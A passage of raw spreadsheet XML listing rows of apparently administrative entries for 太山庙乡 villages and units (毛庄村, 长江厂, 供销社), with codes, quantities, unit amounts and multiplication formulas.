      <c r="A2354" s="13" t="s">
        <v>6155</v>
      </c>
      <c r="B2354" s="14" t="str">
        <f>B2353</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2354" s="14" t="str">
        <f>C2353</f>
        <v>毛庄村</v>
      </c>
      <c r="D2354" s="18" t="s">
        <v>6156</v>
      </c>
      <c r="E2354" s="18" t="s">
        <v>6157</v>
      </c>
      <c r="F2354" s="14">
        <f>F2353</f>
        <v>4113210704</v>
      </c>
      <c r="G2354" s="14"/>
      <c r="H2354" s="14"/>
      <c r="I2354" s="14"/>
      <c r="J2354" s="14"/>
      <c r="K2354" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2355" ht="23" customHeight="1" spans="1:11">
      <c r="A2355" s="13" t="s">
        <v>6158</v>
      </c>
      <c r="B2355" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2355" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2355" s="14" t="s">
        <v>6159</v>
      </c>
      <c r="E2355" s="14" t="s">
        <v>5605</v>
      </c>
      <c r="F2355" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2355" s="14">
        <v>1</v>
      </c>
      <c r="H2355" s="14">
        <v>340</v>
      </c>
      <c r="I2355" s="14">
        <f>H2355*G2355</f>
        <v>340</v>
      </c>
      <c r="J2355" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2355" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2356" ht="23" customHeight="1" spans="1:11">
      <c r="A2356" s="13" t="s">
        <v>6160</v>
      </c>
      <c r="B2356" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2356" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2356" s="14" t="s">
        <v>6161</v>
      </c>
      <c r="E2356" s="14" t="s">
        <v>5755</v>
      </c>
      <c r="F2356" s="14" t="s">
        <v>6162</v>
      </c>
      <c r="G2356" s="14">
        <v>1</v>
      </c>
      <c r="H2356" s="14">
        <v>340</v>
      </c>
      <c r="I2356" s="14">
        <f>H2356*G2356</f>
        <v>340</v>
      </c>
      <c r="J2356" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2356" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2357" ht="23" customHeight="1" spans="1:11">
      <c r="A2357" s="13" t="s">
        <v>6163</v>
      </c>
      <c r="B2357" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2357" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2357" s="14" t="s">
        <v>6164</v>
      </c>
      <c r="E2357" s="14" t="s">
        <v>5617</v>
      </c>
      <c r="F2357" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2357" s="14">
        <v>1</v>
      </c>
      <c r="H2357" s="14">
        <v>340</v>
      </c>
      <c r="I2357" s="14">
        <f>H2357*G2357</f>
        <v>340</v>
      </c>
      <c r="J2357" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2357" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2358" ht="23" customHeight="1" spans="1:11">
      <c r="A2358" s="13" t="s">
        <v>6165</v>
      </c>
      <c r="B2358" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2358" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2358" s="14" t="s">
        <v>6166</v>
      </c>
      <c r="E2358" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2358" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2358" s="14">
        <v>2</v>
      </c>
      <c r="H2358" s="14">
        <v>300</v>
      </c>
      <c r="I2358" s="14">
        <f>H2358*G2358</f>
        <v>600</v>
      </c>
      <c r="J2358" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2358" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2359" ht="23" customHeight="1" spans="1:11">
      <c r="A2359" s="13" t="s">
        <v>6167</v>
      </c>
      <c r="B2359" s="14" t="str">
        <f>B2358</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2359" s="14" t="str">
        <f>C2358</f>
        <v>毛庄村</v>
      </c>
      <c r="D2359" s="18" t="s">
        <v>6168</v>
      </c>
      <c r="E2359" s="18" t="s">
        <v>5647</v>
      </c>
      <c r="F2359" s="14">
        <f>F2358</f>
        <v>4113210704</v>
      </c>
      <c r="G2359" s="14"/>
      <c r="H2359" s="14"/>
      <c r="I2359" s="14"/>
      <c r="J2359" s="14"/>
      <c r="K2359" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2360" ht="23" customHeight="1" spans="1:11">
      <c r="A2360" s="13" t="s">
        <v>6169</v>
      </c>
      <c r="B2360" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2360" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2360" s="14" t="s">
        <v>6170</v>
      </c>
      <c r="E2360" s="14" t="s">
        <v>5202</v>
      </c>
      <c r="F2360" s="14">
        <v>4113210712</v>
      </c>
      <c r="G2360" s="14">
        <v>1</v>
      </c>
      <c r="H2360" s="14">
        <v>340</v>
      </c>
      <c r="I2360" s="14">
        <f t="shared" ref="I2360:I2365" si="111">H2360*G2360</f>
        <v>340</v>
      </c>
      <c r="J2360" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2360" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2361" ht="23" customHeight="1" spans="1:11">
      <c r="A2361" s="13" t="s">
        <v>6171</v>
      </c>
      <c r="B2361" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2361" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2361" s="14" t="s">
        <v>6172</v>
      </c>
      <c r="E2361" s="14" t="s">
        <v>6173</v>
      </c>
      <c r="F2361" s="14">
        <v>4113210714</v>
      </c>
      <c r="G2361" s="14">
        <v>1</v>
      </c>
      <c r="H2361" s="14">
        <v>340</v>
      </c>
      <c r="I2361" s="14">
        <f t="shared" si="111"/>
        <v>340</v>
      </c>
      <c r="J2361" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2361" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2362" ht="23" customHeight="1" spans="1:11">
      <c r="A2362" s="13" t="s">
        <v>6174</v>
      </c>
      <c r="B2362" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2362" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2362" s="14" t="s">
        <v>6175</v>
      </c>
      <c r="E2362" s="14" t="s">
        <v>5741</v>
      </c>
      <c r="F2362" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2362" s="14">
        <v>1</v>
      </c>
      <c r="H2362" s="14">
        <v>340</v>
      </c>
      <c r="I2362" s="14">
        <f t="shared" si="111"/>
        <v>340</v>
      </c>
      <c r="J2362" s="14" t="s">
        <v>6176</v>
      </c>
      <c r="K2362" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2363" ht="23" customHeight="1" spans="1:11">
      <c r="A2363" s="13" t="s">
        <v>6177</v>
      </c>
      <c r="B2363" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2363" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2363" s="14" t="s">
        <v>6178</v>
      </c>
      <c r="E2363" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2363" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2363" s="14">
        <v>1</v>
      </c>
      <c r="H2363" s="14">
        <v>340</v>
      </c>
      <c r="I2363" s="14">
        <f t="shared" si="111"/>
        <v>340</v>
      </c>
      <c r="J2363" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2363" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2364" ht="23" customHeight="1" spans="1:11">
      <c r="A2364" s="13" t="s">
        <v>6179</v>
      </c>
      <c r="B2364" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2364" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2364" s="14" t="s">
        <v>6180</v>
      </c>
      <c r="E2364" s="14" t="s">
        <v>5628</v>
      </c>
      <c r="F2364" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2364" s="14">
        <v>1</v>
      </c>
      <c r="H2364" s="14">
        <v>340</v>
      </c>
      <c r="I2364" s="14">
        <f t="shared" si="111"/>
        <v>340</v>
      </c>
      <c r="J2364" s="14" t="s">
        <v>6181</v>
      </c>
      <c r="K2364" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2365" ht="23" customHeight="1" spans="1:11">
      <c r="A2365" s="13" t="s">
        <v>6182</v>
      </c>
      <c r="B2365" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2365" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2365" s="14" t="s">
        <v>6183</v>
      </c>
      <c r="E2365" s="14" t="s">
        <v>5610</v>
      </c>
      <c r="F2365" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2365" s="14">
        <v>2</v>
      </c>
      <c r="H2365" s="14">
        <v>315</v>
      </c>
      <c r="I2365" s="14">
        <f t="shared" si="111"/>
        <v>630</v>
      </c>
      <c r="J2365" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2365" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2366" ht="23" customHeight="1" spans="1:11">
      <c r="A2366" s="13" t="s">
        <v>6184</v>
      </c>
      <c r="B2366" s="14" t="str">
        <f>B2365</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2366" s="14" t="str">
        <f>C2365</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2366" s="13" t="s">
        <v>6185</v>
      </c>
      <c r="E2366" s="14" t="s">
        <v>3562</v>
      </c>
      <c r="F2366" s="14" t="str">
        <f>F2365</f>
        <v>4113210705</v>
      </c>
      <c r="G2366" s="14"/>
      <c r="H2366" s="14"/>
      <c r="I2366" s="14"/>
      <c r="J2366" s="14"/>
      <c r="K2366" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2367" ht="23" customHeight="1" spans="1:11">
      <c r="A2367" s="13" t="s">
        <v>6186</v>
      </c>
      <c r="B2367" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2367" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2367" s="14" t="s">
        <v>6187</v>
      </c>
      <c r="E2367" s="14" t="s">
        <v>6188</v>
      </c>
      <c r="F2367" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2367" s="14">
        <v>1</v>
      </c>
      <c r="H2367" s="14">
        <v>500</v>
      </c>
      <c r="I2367" s="14">
        <f>H2367*G2367</f>
        <v>500</v>
      </c>
      <c r="J2367" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2367" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2368" ht="23" customHeight="1" spans="1:11">
      <c r="A2368" s="13" t="s">
        <v>6189</v>
      </c>
      <c r="B2368" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2368" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2368" s="14" t="s">
        <v>6190</v>
      </c>
      <c r="E2368" s="14" t="s">
        <v>5902</v>
      </c>
      <c r="F2368" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2368" s="14">
        <v>2</v>
      </c>
      <c r="H2368" s="14">
        <v>300</v>
      </c>
      <c r="I2368" s="14">
        <f>H2368*G2368</f>
        <v>600</v>
      </c>
      <c r="J2368" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2368" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2369" ht="23" customHeight="1" spans="1:11">
      <c r="A2369" s="13" t="s">
        <v>6191</v>
      </c>
      <c r="B2369" s="14" t="str">
        <f>B2368</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2369" s="14" t="str">
        <f>C2368</f>
        <v>毛庄村</v>
      </c>
      <c r="D2369" s="41" t="s">
        <v>1121</v>
      </c>
      <c r="E2369" s="42" t="s">
        <v>5668</v>
      </c>
      <c r="F2369" s="14">
        <f>F2368</f>
        <v>4113210704</v>
      </c>
      <c r="G2369" s="14"/>
      <c r="H2369" s="14"/>
      <c r="I2369" s="14"/>
      <c r="J2369" s="24"/>
      <c r="K2369" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2370" ht="23" customHeight="1" spans="1:11">
      <c r="A2370" s="13" t="s">
        <v>6192</v>
      </c>
      <c r="B2370" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2370" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2370" s="14" t="s">
        <v>6193</v>
      </c>
      <c r="E2370" s="14" t="s">
        <v>6194</v>
      </c>
      <c r="F2370" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2370" s="14">
        <v>1</v>
      </c>
      <c r="H2370" s="14">
        <v>340</v>
      </c>
      <c r="I2370" s="14">
        <f>H2370*G2370</f>
        <v>340</v>
      </c>
      <c r="J2370" s="24">
        <v>45536</v>
      </c>
      <c r="K2370" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2371" ht="23" customHeight="1" spans="1:11">
      <c r="A2371" s="13" t="s">
        <v>6195</v>
      </c>
      <c r="B2371" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2371" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2371" s="14" t="s">
        <v>6196</v>
      </c>
      <c r="E2371" s="14" t="s">
        <v>6058</v>
      </c>
      <c r="F2371" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2371" s="14">
        <v>1</v>
      </c>
      <c r="H2371" s="14">
        <v>340</v>
      </c>
      <c r="I2371" s="14">
        <f>H2371*G2371</f>
        <v>340</v>
      </c>
      <c r="J2371" s="14">
        <v>45139</v>
      </c>
      <c r="K2371" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2372" ht="23" customHeight="1" spans="1:11">
      <c r="A2372" s="13" t="s">
        <v>6197</v>
      </c>
      <c r="B2372" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2372" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2372" s="14" t="s">
        <v>6199</v>
      </c>
      <c r="E2372" s="14" t="s">
        <v>3365</v>
      </c>
      <c r="F2372" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2372" s="14">
        <v>2</v>
      </c>
      <c r="H2372" s="14">
        <v>300</v>
      </c>
      <c r="I2372" s="14">
        <f>H2372*G2372</f>
        <v>600</v>
      </c>
      <c r="J2372" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2372" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2373" ht="23" customHeight="1" spans="1:11">
      <c r="A2373" s="13" t="s">
        <v>6200</v>
      </c>
      <c r="B2373" s="14" t="str">
        <f>B2372</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2373" s="14" t="str">
        <f>C2372</f>
        <v>长江厂</v>
      </c>
      <c r="D2373" s="69" t="s">
        <v>6201</v>
      </c>
      <c r="E2373" s="69" t="s">
        <v>6202</v>
      </c>
      <c r="F2373" s="14" t="str">
        <f>F2372</f>
        <v>4113210712</v>
      </c>
      <c r="G2373" s="14"/>
      <c r="H2373" s="14"/>
      <c r="I2373" s="14"/>
      <c r="J2373" s="14"/>
      <c r="K2373" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2374" ht="23" customHeight="1" spans="1:11">
      <c r="A2374" s="13" t="s">
        <v>6203</v>
      </c>
      <c r="B2374" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2374" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2374" s="14" t="s">
        <v>6204</v>
      </c>
      <c r="E2374" s="14" t="s">
        <v>5631</v>
      </c>
      <c r="F2374" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2374" s="14">
        <v>3</v>
      </c>
      <c r="H2374" s="14">
        <v>295</v>
      </c>
      <c r="I2374" s="14">
        <f>H2374*G2374</f>
        <v>885</v>
      </c>
      <c r="J2374" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2374" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2375" ht="23" customHeight="1" spans="1:11">
      <c r="A2375" s="13" t="s">
        <v>6205</v>
      </c>
      <c r="B2375" s="14" t="str">
        <f>B2374</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2375" s="14" t="str">
        <f>C2374</f>
        <v>长江厂</v>
      </c>
      <c r="D2375" s="69" t="s">
        <v>6206</v>
      </c>
      <c r="E2375" s="18" t="s">
        <v>3458</v>
      </c>
      <c r="F2375" s="14" t="str">
        <f>F2374</f>
        <v>4113210712</v>
      </c>
      <c r="G2375" s="14"/>
      <c r="H2375" s="14"/>
      <c r="I2375" s="14"/>
      <c r="J2375" s="14"/>
      <c r="K2375" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2376" ht="23" customHeight="1" spans="1:11">
      <c r="A2376" s="13" t="s">
        <v>6207</v>
      </c>
      <c r="B2376" s="14" t="str">
        <f>B2375</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2376" s="14" t="str">
        <f>C2375</f>
        <v>长江厂</v>
      </c>
      <c r="D2376" s="70" t="s">
        <v>6208</v>
      </c>
      <c r="E2376" s="70" t="s">
        <v>6209</v>
      </c>
      <c r="F2376" s="14" t="str">
        <f>F2375</f>
        <v>4113210712</v>
      </c>
      <c r="G2376" s="14"/>
      <c r="H2376" s="14"/>
      <c r="I2376" s="14"/>
      <c r="J2376" s="14"/>
      <c r="K2376" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2377" ht="23" customHeight="1" spans="1:11">
      <c r="A2377" s="13" t="s">
        <v>6210</v>
      </c>
      <c r="B2377" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2377" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2377" s="14" t="s">
        <v>6211</v>
      </c>
      <c r="E2377" s="14" t="s">
        <v>5767</v>
      </c>
      <c r="F2377" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2377" s="14">
        <v>1</v>
      </c>
      <c r="H2377" s="14">
        <v>340</v>
      </c>
      <c r="I2377" s="14">
        <f>H2377*G2377</f>
        <v>340</v>
      </c>
      <c r="J2377" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2377" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2378" ht="23" customHeight="1" spans="1:11">
      <c r="A2378" s="13" t="s">
        <v>6212</v>
      </c>
      <c r="B2378" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2378" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2378" s="14" t="s">
        <v>6213</v>
      </c>
      <c r="E2378" s="14" t="s">
        <v>6214</v>
      </c>
      <c r="F2378" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2378" s="14">
        <v>2</v>
      </c>
      <c r="H2378" s="14">
        <v>300</v>
      </c>
      <c r="I2378" s="14">
        <f>H2378*G2378</f>
        <v>600</v>
      </c>
      <c r="J2378" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2378" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2379" ht="23" customHeight="1" spans="1:11">
      <c r="A2379" s="13" t="s">
        <v>6215</v>
      </c>
      <c r="B2379" s="14" t="str">
        <f>B2378</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2379" s="14" t="str">
        <f>C2378</f>
        <v>长江厂</v>
      </c>
      <c r="D2379" s="18" t="s">
        <v>6216</v>
      </c>
      <c r="E2379" s="19" t="s">
        <v>6217</v>
      </c>
      <c r="F2379" s="14" t="str">
        <f>F2378</f>
        <v>4113210712</v>
      </c>
      <c r="G2379" s="14"/>
      <c r="H2379" s="14"/>
      <c r="I2379" s="14"/>
      <c r="J2379" s="14"/>
      <c r="K2379" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2380" ht="23" customHeight="1" spans="1:11">
      <c r="A2380" s="13" t="s">
        <v>6218</v>
      </c>
      <c r="B2380" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2380" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2380" s="14" t="s">
        <v>6219</v>
      </c>
      <c r="E2380" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2380" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2380" s="14">
        <v>1</v>
      </c>
      <c r="H2380" s="14">
        <v>340</v>
      </c>
      <c r="I2380" s="14">
        <f t="shared" ref="I2380:I2385" si="112">H2380*G2380</f>
        <v>340</v>
      </c>
      <c r="J2380" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2380" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2381" ht="23" customHeight="1" spans="1:11">
      <c r="A2381" s="13" t="s">
        <v>6220</v>
      </c>
      <c r="B2381" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2381" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2381" s="14" t="s">
        <v>6221</v>
      </c>
      <c r="E2381" s="14" t="s">
        <v>6096</v>
      </c>
      <c r="F2381" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2381" s="14">
        <v>1</v>
      </c>
      <c r="H2381" s="14">
        <v>340</v>
      </c>
      <c r="I2381" s="14">
        <f t="shared" si="112"/>
        <v>340</v>
      </c>
      <c r="J2381" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2381" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2382" ht="23" customHeight="1" spans="1:11">
      <c r="A2382" s="13" t="s">
        <v>6222</v>
      </c>
      <c r="B2382" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2382" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2382" s="14" t="s">
        <v>6223</v>
      </c>
      <c r="E2382" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2382" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2382" s="14">
        <v>1</v>
      </c>
      <c r="H2382" s="14">
        <v>340</v>
      </c>
      <c r="I2382" s="14">
        <f t="shared" si="112"/>
        <v>340</v>
      </c>
      <c r="J2382" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2382" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2383" ht="23" customHeight="1" spans="1:11">
      <c r="A2383" s="13" t="s">
        <v>6224</v>
      </c>
      <c r="B2383" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2383" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2383" s="14" t="s">
        <v>6225</v>
      </c>
      <c r="E2383" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2383" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2383" s="14">
        <v>1</v>
      </c>
      <c r="H2383" s="14">
        <v>340</v>
      </c>
      <c r="I2383" s="14">
        <f t="shared" si="112"/>
        <v>340</v>
      </c>
      <c r="J2383" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2383" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2384" ht="23" customHeight="1" spans="1:11">
      <c r="A2384" s="13" t="s">
        <v>6226</v>
      </c>
      <c r="B2384" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2384" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2384" s="14" t="s">
        <v>6227</v>
      </c>
      <c r="E2384" s="14" t="s">
        <v>2282</v>
      </c>
      <c r="F2384" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2384" s="14">
        <v>1</v>
      </c>
      <c r="H2384" s="14">
        <v>340</v>
      </c>
      <c r="I2384" s="14">
        <f t="shared" si="112"/>
        <v>340</v>
      </c>
      <c r="J2384" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2384" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2385" ht="23" customHeight="1" spans="1:11">
      <c r="A2385" s="13" t="s">
        <v>6228</v>
      </c>
      <c r="B2385" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2385" s="14" t="s">
        <v>6198</v>
      </c>
      <c r="D2385" s="14" t="s">
        <v>6229</v>
      </c>
      <c r="E2385" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2385" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2385" s="14">
        <v>2</v>
      </c>
      <c r="H2385" s="14">
        <v>300</v>
      </c>
      <c r="I2385" s="14">
        <f t="shared" si="112"/>
        <v>600</v>
      </c>
      <c r="J2385" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2385" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2386" ht="23" customHeight="1" spans="1:11">
      <c r="A2386" s="13" t="s">
        <v>6230</v>
      </c>
      <c r="B2386" s="14" t="str">
        <f>B2385</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2386" s="14" t="str">
        <f>C2385</f>
        <v>长江厂</v>
      </c>
      <c r="D2386" s="18" t="s">
        <v>6231</v>
      </c>
      <c r="E2386" s="19" t="s">
        <v>6232</v>
      </c>
      <c r="F2386" s="14" t="str">
        <f>F2385</f>
        <v>4113210712</v>
      </c>
      <c r="G2386" s="14"/>
      <c r="H2386" s="14"/>
      <c r="I2386" s="14"/>
      <c r="J2386" s="14"/>
      <c r="K2386" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2387" ht="23" customHeight="1" spans="1:11">
      <c r="A2387" s="13" t="s">
        <v>6233</v>
      </c>
      <c r="B2387" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2387" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2387" s="14" t="s">
        <v>6234</v>
      </c>
      <c r="E2387" s="14" t="s">
        <v>4526</v>
      </c>
      <c r="F2387" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2387" s="14">
        <v>1</v>
      </c>
      <c r="H2387" s="14">
        <v>340</v>
      </c>
      <c r="I2387" s="14">
        <f>H2387*G2387</f>
        <v>340</v>
      </c>
      <c r="J2387" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2387" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2388" ht="23" customHeight="1" spans="1:11">
      <c r="A2388" s="13" t="s">
        <v>6235</v>
      </c>
      <c r="B2388" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2388" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2388" s="14" t="s">
        <v>6236</v>
      </c>
      <c r="E2388" s="14" t="s">
        <v>5964</v>
      </c>
      <c r="F2388" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2388" s="14">
        <v>2</v>
      </c>
      <c r="H2388" s="14">
        <v>300</v>
      </c>
      <c r="I2388" s="14">
        <f>H2388*G2388</f>
        <v>600</v>
      </c>
      <c r="J2388" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2388" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2389" ht="23" customHeight="1" spans="1:11">
      <c r="A2389" s="13" t="s">
        <v>6237</v>
      </c>
      <c r="B2389" s="14" t="str">
        <f>B2388</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2389" s="14" t="str">
        <f>C2388</f>
        <v>供销社</v>
      </c>
      <c r="D2389" s="69" t="s">
        <v>6238</v>
      </c>
      <c r="E2389" s="69" t="s">
        <v>5575</v>
      </c>
      <c r="F2389" s="14" t="str">
        <f>F2388</f>
        <v>4113210705</v>
      </c>
      <c r="G2389" s="14"/>
      <c r="H2389" s="14"/>
      <c r="I2389" s="14"/>
      <c r="J2389" s="14"/>
      <c r="K2389" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2390" ht="23" customHeight="1" spans="1:11">
      <c r="A2390" s="13" t="s">
        <v>6239</v>
      </c>
      <c r="B2390" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2390" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2390" s="14" t="s">
        <v>6240</v>
      </c>
      <c r="E2390" s="14" t="s">
        <v>6241</v>
      </c>
      <c r="F2390" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2390" s="14">
        <v>1</v>
      </c>
      <c r="H2390" s="14">
        <v>340</v>
      </c>
      <c r="I2390" s="14">
        <f>H2390*G2390</f>
        <v>340</v>
      </c>
      <c r="J2390" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2390" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2391" ht="23" customHeight="1" spans="1:11">
      <c r="A2391" s="13" t="s">
        <v>6242</v>
      </c>
      <c r="B2391" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2391" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2391" s="14" t="s">
        <v>6243</v>
      </c>
      <c r="E2391" s="14" t="s">
        <v>6244</v>
      </c>
      <c r="F2391" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2391" s="14">
        <v>2</v>
      </c>
      <c r="H2391" s="14">
        <v>300</v>
      </c>
      <c r="I2391" s="14">
        <f>H2391*G2391</f>
        <v>600</v>
      </c>
      <c r="J2391" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2391" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2392" ht="23" customHeight="1" spans="1:11">
      <c r="A2392" s="13" t="s">
        <v>6245</v>
      </c>
      <c r="B2392" s="14" t="str">
        <f>B2391</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2392" s="14" t="str">
        <f>C2391</f>
        <v>供销社</v>
      </c>
      <c r="D2392" s="19" t="s">
        <v>6246</v>
      </c>
      <c r="E2392" s="19" t="s">
        <v>6247</v>
      </c>
      <c r="F2392" s="14" t="str">
        <f>F2391</f>
        <v>4113210705</v>
      </c>
      <c r="G2392" s="14"/>
      <c r="H2392" s="14"/>
